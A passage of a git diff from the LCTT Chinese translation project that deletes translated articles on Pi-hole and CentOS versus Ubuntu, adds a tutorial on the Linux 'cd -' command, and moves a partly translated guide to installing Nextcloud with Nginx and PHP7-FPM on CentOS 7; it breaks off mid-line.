http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ - -作者:[Aaron Kili][a] -译者:[GHLandy](https://github.com/GHLandy) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.tecmint.com/author/aaronkili/ -[1]:http://www.tecmint.com/add-users-in-linux/ -[2]:http://www.tecmint.com/su-vs-sudo-and-how-to-configure-sudo-in-linux/ -[3]:http://www.tecmint.com/wp-content/uploads/2017/01/Create-Sudo-Log-File.png -[4]:http://www.tecmint.com/wp-content/uploads/2017/01/Log-sudo-Input-Output.png -[5]:http://www.tecmint.com/13-basic-cat-command-examples-in-linux/ -[6]:http://www.tecmint.com/wp-content/uploads/2017/01/Lecture-Sudo-Users.png -[7]:http://www.tecmint.com/wp-content/uploads/2017/01/Increase-Sudo-Password-Attempts.png -[8]:http://www.tecmint.com/wp-content/uploads/2017/01/Sudo-Insult-Message.png -[9]:http://www.tecmint.com/su-vs-sudo-and-how-to-configure-sudo-in-linux/ -[10]:http://www.tecmint.com/tag/linux-tricks/ diff --git a/translated/tech/20170107 Block Ads on All Your Devices at Home with Pi-hole and an Orange Pi.md b/translated/tech/20170107 Block Ads on All Your Devices at Home with Pi-hole and an Orange Pi.md deleted file mode 100644 index 5a5545cf10..0000000000 --- a/translated/tech/20170107 Block Ads on All Your Devices at Home with Pi-hole and an Orange Pi.md +++ /dev/null @@ -1,81 +0,0 @@ -用 Pi-hole 和 Orange Pi 在你所有的设备上阻止广告 -============================================================ - - -你是否发现在你的浏览器、智能手机和平板上设置广告拦截器很恼火? 至少我是这样的。我家里有一些“智能”设备,然而它们似乎没有任何类型的广告拦截软件。 好了,我了解到 [Pi-hole][2] 是一个 pi 上的广告拦截软件,它能在到达你的设备之前阻止所有的广告。它能让你列出任何域的黑名单或白名单,并且它有一个很好的面板,让你深入了解你的家庭网络最常访问的域/网站、最活跃的设备和最常见的广告商。 - -Pi-hole 的确是针对树莓派上运行的,但我想知道它能否在我运行 Armbian Linux 的廉价 Orange Pi 上运行。 好吧,它绝对可以!下面是我让 Pi-hole 能快速运行的方法。 - - -### 安装 Pi-hole - -安装 Pi-hole 是使用终端完成的,所以打开你的 Orange Pi 桌面上的终端或 ssh 到 pi。 - -你将下载软件,并进入到你选择的目录,确保你有写入权限。像这样: - - -``` -cd / -``` - -我偏离了 Pi-hole 主页上的“一键”安装。 我的意思是,他们说在命令下面说“管道到 bash 可能是危险的”,本地安装是“更安全”。所以,这里是我的本地安装步骤: - -``` -git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole -cd Pi-hole/automated\ install/ -./basic-install.sh -``` - -如果你没有以 root 用户身份登录,那么基本安装脚本将提示你输入密码,然后再继续。 如果需要,脚本将下载并安装一些必备的 Linux 软件包。接着它会显示一个红蓝界面,提示你回答有关如何配置 Pi-hole 的几个问题。以我的经验,直接接受默认值就可以了,我后来发现 Pi-hole 的 web 程序可以更改设置,如DNS提供商。 - -该脚本将告诉你在图形界面和终端中 Pi-hole 的密码。 请记住该密码! - -脚本还会告诉你 Pi-hole 的网址,应该像这样: - -``` -http:///admin -``` - -或者类似这样 - -``` -http://orangepipc/admin -``` - -你需要输入 Pi-hole 密码,接着你会看到像下面这样的漂亮面板: - - ![Ph-hole](https://i1.wp.com/piboards.com/wp-content/uploads/2017/01/ph-hole.png?resize=640%2C532) - -请记住更改家庭网络路由器上的 DNS 设置并使用你 pi 的地址。 否则,广告不会被过滤! - -上面的说明与 Pi-hole 网站提供的替代“安全”方法大致相同,尽管 Armbian 没有被列为官方支持的操作系统。我相信这些说明应该在 Raspberry Pi 或其他运行某种形式的基于 Debian 的 Linux 操作系统的 pi 上工作。但是,我并没有测试,我有兴趣听到你的经验(请给我留下简短的评论)。 - - -### 思考和观察 - -运行 Pi-hole 一段时间后,在 Pi-hole 面板上出现一些学习信息,我发现有比我所知道的更多的网络活动,它们并不是所有我批准的活动。例如,有一些我不知道的关于游戏程序的“有趣”连接从我的孩子的设备上发出,加上社交网络程序显然一直在给我发送骚扰数据。总之,无论是否是良性流量,我很高兴减少了流量负载,即使有点少。。。我的意思是,为什么我应该允许我不想要的或者不关心的应用程序和广告吃掉我的网络流量?好吧,现在他们被封锁了。 - -像这样为 Orange Pi 设置广告屏蔽很便宜、容易,并有助于在限制一些不必要的流量从我的家庭网络中来回(特别是关于孩子们的)中放松我的大脑。如果你有兴趣,你可以看到我上一篇文章关于如何[轻松设置一个 Orange Pi][3],并使用下面的链接来查看 Orange Pi 是多么便宜。我相信这是一个值得投资东西。 - -Amazon 上的 Orange Pi (附属链接):  [Orange Pi PC Single Board Computer Quad Core ARM Cortex-A7 1GB DDR3 4K Decode][4] - -[AliExpress 上的Orange Pi 商店][5] (附属连接). - -编辑:这篇文章讽刺的是,如果你成功设置了 Pi-hole,这个站点上的链接 (s.click.aliexpress.com) 将被屏蔽,是否加入到白名单取决于你。 - --------------------------------------------------------------------------------- - -via: http://piboards.com/2017/01/07/block-ads-on-all-your-devices-at-home-with-pi-hole-and-an-orange-pi/ - -作者:[MIKE WILMOTH][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://piboards.com/author/piguy/ -[1]:http://s.click.aliexpress.com/deep_link.htm?aff_short_key=N3VJQBY&dl_target_url=http://best.aliexpress.com -[2]:https://pi-hole.net/ -[3]:http://piboards.com/2017/01/04/easy-set-up-orange-pi/ -[4]:https://www.amazon.com/gp/product/B018W6OTIM/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=B018W6OTIM&linkCode=as2&tag=piboards-20&linkId=ac292a536d58eabf1ee73e2c575e1111 -[5]:http://s.click.aliexpress.com/e/bAMVj2R diff --git a/translated/tech/20170109 4 open source alternatives to Trello that you can self-host.md b/translated/tech/20170109 4 open source alternatives to Trello that you can self-host.md index 148e8f283b..9835d2d7c5 100644 --- a/translated/tech/20170109 4 open source alternatives to Trello that you can self-host.md +++ b/translated/tech/20170109 4 open source alternatives to Trello that you can self-host.md @@ -69,7 +69,7 @@ via: http://linuxbsdos.com/2017/01/09/4-open-source-alternatives-to-trello-that- 作者:[linuxbsdos.com][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[jasminepeng](https://github.com/jasminepeng) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20170109 CentOS vs Ubuntu: Which one is better for a server.md b/translated/tech/20170109 CentOS vs Ubuntu: Which one is better for a server.md deleted file mode 100644 index f81629d1ea..0000000000 --- a/translated/tech/20170109 CentOS vs Ubuntu: Which one is better for a server.md +++ /dev/null @@ -1,76 +0,0 @@ -CentOS vs Ubuntu:哪个对服务器更好? -============================================================ - -![](https://thishosting.rocks/wp-content/uploads/2017/01/centos-vs-ubuntu.jpg.webp) - -已经决定买一个VPS,但还不能决定使用哪个 Linux 发行版?我们都经历过。在考虑到了所有的发行版后,即使对 Linux 发行版而言,这个[_决定_][3]甚至可能是压倒性的。虽然两个最广泛使用和最流行的服务器发行版是 CentOS 和 Ubuntu。这是管理员、初学者和专业人士之间的主要困境。有了(和更多)发行版的经验,我们决定在用于服务器时比较 CentOS 和 Ubuntu。 - -### 快速浏览 - -| ![CentOS](https://thishosting.rocks/wp-content/uploads/2017/01/centos-logo-50.png.webp) CentOS | ![Ubuntu](https://thishosting.rocks/wp-content/uploads/2017/01/ubuntu-logo-50.png.webp) Ubuntu | -| --- | --- | -| 基于 Red Hat Linux Enterprise | 基于 Debian | -| 更少频率更新 | 经常更新 | -| 可以更稳定和更安全,因为不经常更新。 | 更新的软件包可能不稳定,不安全,这是不可能的,因为他们在推出正式发布前进行了大量测试。 | -| 没有足够的教程和更小的用户群 | 丰富的文档,活跃的社区和大量的在线教程| -| 对初学者困难,因为没有流行和广泛使用的基于 Red Hat 桌面发行版| 更容易为已经熟悉桌面版 Ubuntu 的初学者使用| -| 支持 cPanel | 不支持 cPanel | -| .rpm 软件包和 “yum” 软件包管理器 | .deb 软件包和 “apt-get” 软件包管理器 | -| 在 [DigitalOcean][1] 免费试用 CentOS 服务器 | 在[DigitalOcean][2] 免费试用 Ubuntu 服务器 | - -### 哪个对新手更好? - -Ubuntu。一如往常那样,它高度取决于你的需求和以前的经验,但一般来说,Ubuntu 是初学者的更好的选择。主要是因为这两个原因: - -* Ubuntu有一个庞大的社区,随时可以免费提供帮助。我指的是真正的大。数以千计的用户在数百个不同的在线论坛和组内。甚至有现实生活中的大会。你仍然可以为 CentOS 找到很多教程和帮助,特别是对于简单的 LAMP 栈和流行的应用程序而言。 -* Ubuntu 服务器对于以前使用过 Ubuntu 桌面的人来说会容易得多。 CentOS 和 Fedora 也是如此,但是 Ubuntu 桌面版比任何其他基于 Linux 的家庭版本更受欢迎。 - -所以,如果你是一个初学者,而且没有任何特殊要求,那就去使用 Ubuntu 服务器。 更好的是,如果你从一个[便宜的托管服务提供商][4]那购买服务,你可以在你的服务器上进行实验,还有一个[专业的 24/7 支持团队][7]准备好帮助你。 - -### 哪个在商业上更好? - -CentOS。再说一次,你仍然可以使用 Ubuntu 作为商业网站或公司内部服务器,但 CentOS 有它的优势: - -* CentOS(可以说)更稳定以及更安全。由于 CentOS 的更新频率较低,这意味着软件测试的时间更长,并且只有真正稳定的版本才会得到发布。如果你使用 CentOS,你不会在一个新的有 bug 版本的应用程序得到任何稳定性问题,因为你不会得到那个新的有 bug 的版本。 -* 大多数控制面板(包括最受欢迎的控制面板 - cPanel)仅支持CentOS。所以这意味着如果你是一个网络托管公司,或者如果你是一个有很多客户的网络代理,并且需要一个控制面板 - CentOS 是一个更好的选择。 - -### 尝试一下它们并选择一个 - -如果你还是不能决定,你可以免费试试它们。你可以在本地安装或使用 live 镜像。你还可以从 [Vultr][6] 和 [DigitalOcean][7] 买到便宜的 VPS($5/月)。你可以在几秒钟内启动 CentOS/Ubuntu 服务器。当你通过推广链接(如我们的)注册,你可能会得到免费金额 - 这意味着你会真的可以免费试用。 - -### 哪个更快? - -它们在速度方面是相同的。它们和在你的硬件上运行一样快。它们将与你配置它们一样快。不管怎样,你都应该正确配置并且保护所有的服务器、配置和应用程序。 - -你会使用哪个发行版?想告诉我们我们是怎样一群[这里插入发行版]的拥趸么?请随时留下评论。 - --------------------------------------------------------------------------------- - -作者简介: - -![](https://secure.gravatar.com/avatar/434d2dd9d04f6ef4952470e716b4d20c?s=80&d=retro&r=pg) - -我的大多数 Linux 服务器部署都是针对企业客户端的,所以我对文章作者在引用 GUI 客户端版本中对任何服务器管理功能感到困惑。通常,即使在虚拟专用服务器(VPN)环境中,许多服务提供商也会在 CentOS、Ubuntu上或经常部署的 OpenSuse Leap 和 FreeBSD 10+ 服务器操作系统上使用 WebMin、VirtualAdmin 或类似工具作为控制面板。 - -CentOS 在许多业务程序以及高级网络/虚拟化和云计算环境方面具有优于 Ubuntu 的优势,并且 CentOS 充分利用 SELinux 框架用于加强的安全层,目前在 Ubuntu 中不可用(或不容易)。 - -这种类型的比较通常是多余的,因为几乎总是有特定的和细微的要求和服务器实现的需求,将决定哪个发行版具有更多的优势或目的 - 基于技术专家/托管公司的专业知识和广泛的经验。 - --------------------------------------------------------------------------------- - -via: https://thishosting.rocks/centos-vs-ubuntu-server/ - -作者:[W. Anderson][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://thishosting.rocks/centos-vs-ubuntu-server/ -[1]:https://thishosting.rocks/go/digitalocean/ -[2]:https://thishosting.rocks/go/digitalocean/ -[3]:https://thishosting.rocks/how-to-choose-web-hosting/ -[4]:https://thishosting.rocks/best-cheap-managed-vps/ -[5]:https://thishosting.rocks/support/ -[6]:https://thishosting.rocks/go/vultr/ -[7]:https://thishosting.rocks/go/digitalocean/ diff --git a/translated/tech/20170111 Linux command line navigation tips and tricks - part 1.md b/translated/tech/20170111 Linux command line navigation tips and tricks - part 1.md new file mode 100644 index 0000000000..3664e750ea --- /dev/null +++ b/translated/tech/20170111 Linux command line navigation tips and tricks - part 1.md @@ -0,0 +1,149 @@ +Linux command line navigation tips and tricks - part 1 +============================================================ +Linux 命令行工具使用小贴士及技巧——(一) + +### 相关内容 + +1. [Linux 命令行工具使用的一些小技巧][3] + 1. [频繁地在两个目录之间切换——快捷方式][1] + 2. [频繁地在两个目录之间切换——相关细节][2] +2. [总结][4] + +如果你刚开始在 Linux 系统中使用命令行工具,那么学会使用这个 Linux 操作系统中功能最强大和有用的工具之一是非常有意义的一件事。学习的难易程度跟你想研究的深度有关。但是,无论你的技术能力水平怎么样,这篇文章中的一些小贴士和技巧都会对你有所帮助。 + +在本系列的文章中,我们将会讨论一些非常有用的命令行工具使用小技巧,希望对你有所帮助。 + +但是在开始下一步之前,我得强调一点,这篇文章中的测试实例都是在 Ubuntu 14.04LTS 系统下测试通过的。我们使用命令行 Shell 版本是 bash 4.3.11 。 + +### Linux 命令行小技巧 + +我们假设你已经掌握了一些 Linux 命令行的基础知识,比如什么是 root 账号及 home 目录,什么是环境变量,如何查看目录内容等等。同时,这些小技巧也不是无中生有的,是有理有据的。 + +### 频繁地在两个目录之间切换——快捷方式 + +假设你正在命令行下做一些操作,并且你需要经常在两个目录间来回切换。而且这两个目录在完全不同的两个路径下,比如说,有两个目录分别在 /home/ 和 /usr/ 下。你会怎么做呢? + +其中,最简单直接的方式就是输入这些目录的全路径。虽然这种方式本身没什么问题,但是却很浪费时间。另外一种方式就是打开两个终端窗口分别进行操作。但是这两种方式使用起来既不方便,也显得没啥技术含量。 + +你应该感到庆幸的是,还有另外一种更为简捷的方法来解决这个问题。你需要做的就是先手动切换到这两个目录(通过 **cd** 命令分别加上各自的路径),之后你就可以使用 **cd -** 命令在两个目录之间来回快速切换了。 + +例如: + +我现在在下面的目录: + +``` +$ pwd +/home/himanshu/Downloads +``` + +然后,我切换到 /usr/ 路径下的其它目录: + +``` +cd /usr/lib/ +``` + +现在,我可以很方便的使用下面的命令来向前向后快速地切换到两个目录: + +``` +cd - +``` + +下面是 **cd -** 命令的操作截图: + +[ + ![The Linux cd command](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips.png) +][5] + +有一点我得跟大家强调下,如果你在操作的过程中使用 cd 加路径的方式切换到第三个目录下,那么 **cd -** 命令将应用于当前目录及第三个目录之间进行切换。 + +### 频繁地在两个目录之间切换——相关细节 + +对于那些有强烈好奇心的用户,他们想搞懂 **cd -** 的工作原理,解释如下:如大家所知道的那样, cd 命令需要加上一个路径作为它的参数。现在,当 - 符号作为参数传输给 cd 命令时,它将被 OLDPWD 环境变量的值所替代。 + +[ + ![The cd command explained](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips-oldpwd.png) +][6] + +现在应该明白了吧, OLDPWD 环境变量存储的是前一个操作目录的路径。这个解释在 cd 命令的 man 帮助文档中有说明,但是,很遗憾的是你的系统中可能没有预先安装 man 命令帮助工具(至少在 Ubuntu 系统下没有安装)。 + +但是,安装这个 man 帮助工具也很简单,你只需要执行下的安装命令即可: + +``` +sudo apt-get install manpages-posix +``` + +然后做如下操作:And then do: + +``` +man cd +``` + +打开 man 帮助文档主页后,你将会看到下面很明确的解释: + +``` +—— 当 - 符号被用作 cd 命令的参数值时,将等同于下面的操作命令: + + cd "$OLDPWD" && pwd +``` + +毫无疑问, cd 命令设置了 OLDPWD 环境变量值。因此每一次你切换操作目录时,上一个目录的路径就会被保存到这个变量里。这让我们看到很重要的一点就是:无论你什么时候执行一个新的 shell 命令(包括手动执行或是使用 shell 脚本),都不存在 ‘上一个工作目录’。 + +[ + ![Hyphen and the cd command](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips-no-oldpwd.png) +][7] + +这也很符合逻辑,因为 cd 命令设置了 OLDPWD 环境变量值。因此,在你执行 cd 命令之前, OLDPWD 环境变量不包含任何值。 + +继续,尽管这有些难以理解, **cd -** 和 **cd $OLDWPD** 命令的执行结果在任何环境下都不尽相同。比如说,如果你重新打开一个新的 shell 窗口时。 + +[ + ![cd command example](https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/cmd-line-tips-oldpwd-home.png) +][8] + +从上面的截图可以清楚的看出,当执行 **cd -** 命令提示未设置 OLDPWD 值时, **cd $OLDPWD** 命令也不会报任何错;实际上,它把当前的工作目录改变到用户的 home 目录里。 + +那是因为 OLDPWD 变量目前还没有被设置, $OLDPWD 仅仅是一个空字符串。因此, **cd $OLDPWD** 命令跟 **cd** 命令的执行结果是一致的,默认情况下,会把用户当前的工作目录切换到用户的 home 目录里。 + +最后,我还遇到过这样的要求,需要让 **cd -** 命令执行的结果不显示出来。我的意思是,有这样的情况(比如说,在写 shell 脚本的时候),你想让 **cd -** 命令的命令执行结果不要把目录信息显示出来。那种情况下,你就可以使用下面的命令方式了: + +``` +cd - &>/dev/null +``` + +上面的命令把文件描述符 2(标准输入)和 1(标准输出)的结果重定向到 [/dev/null][9] 目录。也就是说,这个命令的执行结果不会被显示出来。但是,你也可以使用通用的 [$? 方式][10]来检查这个命令的执行是否异常。如果这个命令执行报错, **echo $?** 将会返回 '1',否则返回 '0'。 + +或者说,如果你觉得 **cd -** 命令提示的错误信息影响不大,你也可以使用下面的命令来代替: + +``` +cd - > /dev/null +``` + +这个命令仅用于将文件描述符 1 (标准输出)重定向到 '/dev/null' 。 + +### 总结 + +遗憾的是,这篇文章仅包含了一个跟命令行相关的小技巧,但是,我们已经地对 **cd -** 命令的使用进行了深入地探讨。建议你在自己的虚拟机中测试本文中的实例。你也可以查看 man 帮助文档,然后对 cd 命令进行全面测试。 + +如果你对这篇文章有什么疑问,请在下面的评论区跟大家交流。同时,敬请关注下一篇文章,我们将以同样的方式探讨更多有用的命令行使用技巧。 + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/ + +作者:[Ansh][a] +译者:[rusking](https://github.com/rusking) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/ +[1]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#easily-switch-between-two-directories-the-quick-tip +[2]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#easily-switch-between-two-directories-related-details +[3]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#linux-command-line-tipstricks +[4]:https://www.howtoforge.com/tutorial/linux-command-line-navigation-tips-and-tricks-part-1/#conclusion +[5]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips.png +[6]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips-oldpwd.png +[7]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips-no-oldpwd.png +[8]:https://www.howtoforge.com/images/linux-command-line-tips-for-beginners/big/cmd-line-tips-oldpwd-home.png +[9]:https://en.wikipedia.org/wiki/Null_device +[10]:http://askubuntu.com/questions/29370/how-to-check-if-a-command-succeeded diff --git a/sources/tech/20170112 How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7.md b/translated/tech/20170112 How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7.md similarity index 55% rename from sources/tech/20170112 How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7.md rename to translated/tech/20170112 How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7.md index 26bcb1ff2c..2db77a9178 100644 --- a/sources/tech/20170112 How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7.md +++ b/translated/tech/20170112 How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7.md @@ -1,118 +1,143 @@ -How to Install Nextcloud with Nginx and PHP7-FPM on CentOS 7 -============================================================ +如何在 CentOS 7 中使用 Nginx 和 PHP7-FPM 安装 Nextcloud +========================== -### On this page +### 导航 -1. [Step 1 - Install Nginx and PHP7-FPM on CentOS 7][1] -2. [Step 2 - Configure PHP7-FPM][2] -3. [Step 3 - Install and Configure MariaDB][3] -4. [Step 4 - Generate a Self-signed SSL Certificate for Nextcloud][4] -5. [Step 5 - Download and Install Nextcloud][5] -6. [Step 6 - Configure Nextcloud Virtual Host in Nginx][6] -7. [Step 7 - Configure SELinux and FirewallD for Nextcloud][7] -8. [Step 8 - Nextcloud Installation Wizard][8] -9. [Reference][9] +1. [步骤 1 - 在 CentOS 7 中安装 Nginx 和 PHP7-FPM][1] +2. [步骤 2 - 配置 PHP7-FPM][2] +3. [步骤 3 - 安装和配置 MariaDB][3] +4. [步骤 4 - 为 Nextcloud 生成一个自签名 SSL 证书][4] +5. [步骤 5 - 下载和安装 Nextcloud][5] +6. [步骤 6 - 在 Nginx 中为 Nextcloud 配置虚拟主机][6] +7. [步骤 7 - 为 Nextcloud 配置 SELinux 和 FirewallD 规则][7] +8. [步骤 8 - Nextcloud 安装][8] +9. [参考链接][9] -Nextcloud is a free (Open Source) Dropbox-like software, a fork of the ownCloud project. Nextcloud is written in PHP and JavaScript, it supports many database systems such as, MySQL/MariaDB, PostgreSQL, Oracle Database and SQLite. In order to keep your files synchronized between Desktop and your own server, Nextcloud provides applications for Windows, Linux and Mac desktops and a mobile app for android and iOS. Nextcloud is not just a dropbox clone, it provides additional features like Calendar, Contacts, Schedule tasks, and streaming media with Ampache. +Nextcloud 是一款自由 (开源) 的类 Dropbox 软件,由 ownCloud 分支演化形成。它使用 PHP 和 JavaScript 编写,支持多种数据库系统,比如 MySQL/MariaDB、PostgreSQL、Oracle 数据库和 SQLite。为了让你的桌面系统和云服务器中的文件能够保持同步,Nextcloud 为 Windows、Linux、Mac、安卓以及苹果手机都提供了客户端支持。Nextcloud 并非只是 Dropbox 的克隆,他还提供了很多附加特性,如日历、联系人、计划任务以及流媒体 Ampache。 -In this tutorial, I will show you how to install and configure the latest Nextcloud 10 release on a CentOS 7 server. I will run Nextcloud with a Nginx web server and PHP7-FPM and use MariaDB as the database system. +在这片文章中,我将向你展示如何在 CentOS 7 服务器中安装和配置最新版本的 Nextcloud 10。我会通过 Nginx 和 PHP7-FPM 来运行 Nextcloud,同时使用 MariaDB 做为数据库系统。 -**Prerequisite** +**先决条件** -* CentOS 7 64bit -* Root privileges on the server +* 64 位的 CentOS 7 +* 服务器的 Root 权限 -### Step 1 - Install Nginx and PHP7-FPM on CentOS 7 +### 步骤 1 - 在 CentOS 7 中安装 Nginx 和 PHP7-FPM -Before we start with the Nginx and php7-fpm installation, we have to add the EPEL package repository. Install it with this yum command. +在开始安装 Nginx 和 php7-fpm 之前,我们还学要先添加 EPEL 包的仓库源。使用如下命令: +``` yum -y install epel-release +``` -Now install Nginx from the EPEL repository. +现在开始从 EPEL 仓库来安装 Nginx: +``` yum -y install nginx +``` -Then we have to add another repository for php7-fpm. There are several repositories available on the net that provide PHP 7 packages, I will use webtatic here. +然后我们还需要为 php7-fpm 添加另外一个仓库。互联网中有很个远程仓库提供了 PHP 7 系列包,我在这里使用的是 webtatic。 -Add the PHP7-FPM webtatic repository: +添加 PHP7-FPM webtatic 仓库: +``` rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm +``` -Next, install PHP7-FPM and some additional packages for the Nextcloud installation. +然后就是安装 PHP7-FPM 以及 Nextcloud 需要的一些包。 +``` yum -y install php70w-fpm php70w-cli php70w-gd php70w-mcrypt php70w-mysql php70w-pear php70w-xml php70w-mbstring php70w-pdo php70w-json php70w-pecl-apcu php70w-pecl-apcu-devel +``` -Finally, check the PHP version from server terminal to verify that PHP installed correctly. +最后,从服务器终端里查看 PHP 的版本号,以便验证 PHP 是否正确安装。 +``` php -v +``` -[ - ![Check the PHP version on CentOS](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/1.png) -][10] +[![查看 PHP 版本号](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/1.png)][10] -### Step 2 - Configure PHP7-FPM +### 步骤 2 - Configure PHP7-FPM -In this step, we will configure php-fpm to run with Nginx. Php7-fpm will run under user nginx and listen on port 9000. +在这一个步骤中,我们将配置 php-fpm 与 Nginx 协同运行。Php7-fpm 将使用 nginx 用户来运行,并监听 9000 端口。 -Edit the default php7-fpm configuration file with vim. +使用 vim 编辑 默认的 php7-fpm 配置文件。 +``` vim /etc/php-fpm.d/www.conf +``` -In line 8 and 10, change user and group to '**nginx**'. +在第 8 行和第 10行,user 和 group 赋值为 '**nginx**'. +``` user = nginx group = nginx +``` -In line 22, make sure php-fpm is running under server port. +在第 22 行,确保 php-fpm 运行在指定端口。 +``` listen = 127.0.0.1:9000 +``` -Uncomment line 366-370 to activate the php-fpm system environment variables. +去注释第 366-370 行,启用 php-fpm 的系统环境变量。 +``` env[HOSTNAME] = $HOSTNAME env[PATH] = /usr/local/bin:/usr/bin:/bin env[TMP] = /tmp env[TMPDIR] = /tmp env[TEMP] = /tmp +``` -Save the file and exit the vim editor. +保存文件并退出 vim 编辑器。 -Next, create a new directory for the session path in the '/var/lib/' directory, and change the owner to the 'nginx' user. +下一步,就是在 '/var/lib/' 目录下创建一个新的文件夹 session,并将其拥有者变更为 'nginx' 用户。 +``` mkdir -p /var/lib/php/session chown nginx:nginx -R /var/lib/php/session/ +``` -Now start php-fpm and Nginx, then enable the services to start at boot time. +然后启动 php-fpm 和 Nginx,并且将它们设置为随开机启动的服务。 +``` sudo systemctl start php-fpm sudo systemctl start nginx sudo systemctl enable php-fpm sudo systemctl enable nginx +``` -[ - ![Start Nginx and PHP-FPM](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/2.png) -][11] +[![启动 php-fpm 和 Nginx](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/2.png)][11] -PHP7-FPM configuration is done. +PHP7-FPM 配置完成 -### Step 3 - Install and Configure MariaDB +### 步骤 3 - 安装和配置 MariaDB -I will use MariaDB for the Nextcloud database. Install the mariadb-server package from the CentOS repository with yum. +我这里使用 MariaDB 作为 Nextcloud 的数据库。可以直接使用 yum 命令从 CentOS 默认远程仓库中安装 mariadb-server 包。 +``` yum -y install mariadb mariadb-server +``` -Start the MariaDB service and add it to run at boot time. +启动 MariaDB,并将其添加到随系统启动的服务中去。 +``` systemctl start mariadb systemctl enable mariadb +``` -Now configure the MariaDB root password. +现在开始配置 MariaDB 的 root 用户密码。 +``` mysql_secure_installation +``` -Type in your root password when requested. +键入 'Y' ,然后设置MariaDB 的 root 密码。 +``` Set root password? [Y/n] Y New password: Re-enter new password: @@ -121,79 +146,99 @@ Remove anonymous users? [Y/n] Y Disallow root login remotely? [Y/n] Y Remove test database and access to it? [Y/n] Y Reload privilege tables now? [Y/n] Y +``` -The MariaDB root password has been set, now we can login to the mysql shell to create a new database and a new user for Nextcloud. I will create a new database named '**nextcloud_db**' and a user '**nextclouduser**' with password '**nextclouduser@**'. Choose a secure password for your installation! +这样就设置好了密码,现在登录到 mysql shell 并为 Nextcloud 创建一个新的数据库和用户。这里我创建名为 '**nextcloud_db**' 的数据库以及名为 '**nextclouduser**' 的用户,用户密码为 '**nextclouduser@**'。当然了,在创建的时候你要需用一个更安全的密码。 +``` mysql -u root -p -Type Password +``` -Type in the mysql query below to create a new database and a new user. +输入密码即可登录 mysql shell。 +输入以下 mysql 查询语句来创建新的数据库和用户。 + +``` create database nextcloud_db; create user nextclouduser@localhost identified by 'nextclouduser@'; grant all privileges on nextcloud_db.* to nextclouduser@localhost identified by 'nextclouduser@'; flush privileges; +``` -[ - ![Create a Nextcloud database and user in MariaDB](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/3.png) -][12] +[![为 Nextcloud 创建一个新的数据库和用户](https://www.howtoforge.com/images/how-to-install-nextcloud-with-nginx-and-php-fpm-on-centos-7/3.png)][12] -The nextcloud_db database with user 'nextclouduser' has been created. +nextcloud_db 数据库和 'nextclouduser' 用户创建完成 -### Step 4 - Generate a Self-signed SSL Certificate for Nextcloud +### 步骤 4 - 为 Nextcloud 生成一个自签名 SSL 证书 -In this tutorial, I will run nextcloud with a https connection for the client. You can use free SSL such as let's encrypt or create  self signed SSL certificate. I will create my own self-signed SSL certificate file with the OpenSSL command. +在教程中,我会让客户端以 https 连接来运行 Nextcloud。你可以使用诸如 let's encrypt 等免费 SSL 证书,或者是自己创建 自签名 (self signed) SSL 证书。这里我使用 OpenSSL 来创建自己的自签名 SSL 证书。 -Create a new directory for the SSL file. +为 SSL 文件创建新目录: +``` mkdir -p /etc/nginx/cert/ +``` -And generate a new SSL certificate file with the the openssl command below. +如下,使用 openssl 生成一个新的 SSL 证书。 +``` openssl req -new -x509 -days 365 -nodes -out /etc/nginx/cert/nextcloud.crt -keyout /etc/nginx/cert/nextcloud.key +``` -Finally, change the permission of all certificate files to 600 with chmod. +最后使用 'chmod' 命令将所有证书文件的权限设置为 '600'。 +``` chmod 700 /etc/nginx/cert chmod 600 /etc/nginx/cert/* +``` -[ - ![Generate new SSL Certificate file for 